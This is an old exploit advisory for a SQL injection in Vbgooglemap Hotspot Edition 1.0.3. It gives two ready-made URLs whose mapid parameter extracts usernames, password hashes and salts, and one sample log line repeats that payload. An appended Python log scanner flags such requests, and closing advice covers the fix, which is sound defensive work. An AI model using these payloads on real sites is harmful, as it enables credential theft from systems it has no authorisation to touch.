# Title : Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
# Published : 2008-09-27
# Author : elusiven
#######################################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
#
#######################################################################
# Bug discovered by elusiven
# It was priv8
Bug:
[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--
or:
[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--
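
Both requests put SQL into the mapid parameter of a do=showdetails call. The following is an added example, not part of the original advisory: a log scan that flags any request to the two scripts whose mapid is not a plain integer. The combined log format, the /forum/ path, the sample log lines and the rule that a valid mapid is a non-negative integer are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts named in the advisory; both take the injectable mapid parameter.
SCRIPTS = ("vbgooglemaphse.php", "mapa.php")
# Assumption: a legitimate mapid is a plain non-negative integer.
VALID_MAPID = re.compile(r"\d+")
# Assumption: Apache/nginx "combined" access log format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_mapid(url):
    """Return the decoded mapid if it is not a plain integer, else None."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(SCRIPTS):
        return None
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        # PHP also accepts mapid[]=..., which arrives as an array.
        if key != "mapid" and not key.startswith("mapid["):
            continue
        for value in values:
            # parse_qs has already decoded '+' and %XX, so encoding tricks
            # cannot hide non-digit characters from the allowlist check.
            if key != "mapid" or not VALID_MAPID.fullmatch(value):
                return value
    return None

def scan(lines):
    """Return (line number, client address, decoded mapid) for each hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            value = suspicious_mapid(match.group(1))
            if value is not None:
                hits.append((number, line.split()[0], value))
    return hits

# Constructed sample log lines (documentation IP ranges, hypothetical /forum/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Sep/2008:10:00:01 +0000] "GET /forum/vbgooglemaphse.php?do=showdetails&mapid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Sep/2008:10:00:05 +0000] "GET /forum/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user-- HTTP/1.1" 200 6033',
    '198.51.100.7 - - [27/Sep/2008:10:00:09 +0000] "GET /forum/mapa.php?do=showdetails&mapid=-1%20UNION%20SELECT%200 HTTP/1.1" 200 512',
    '192.0.2.11 - - [27/Sep/2008:10:00:12 +0000] "GET /forum/index.php?mapid=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, client, value in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent mapid={value!r}")
```

The same allowlist applies server-side: casting mapid to an integer, or binding it as a query parameter, before it reaches the SQL statement closes the injection.
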
# Special gr33tz for: my sweet Monia :*
# gr33tz for: artii2, GrZyB997, Sp!riT, Msb, Adish, Mandr4ke, eXc!t3, aqtyq, tescik2, stranger, Voldo, KrafT,
# DonJapkO, Gaara, br0wdz, uncalled, cOndemned aka f60.1, zbt, matisto, pr0metheus and all gd pplz from the underground.
# www.Syue.com [2008-09-27]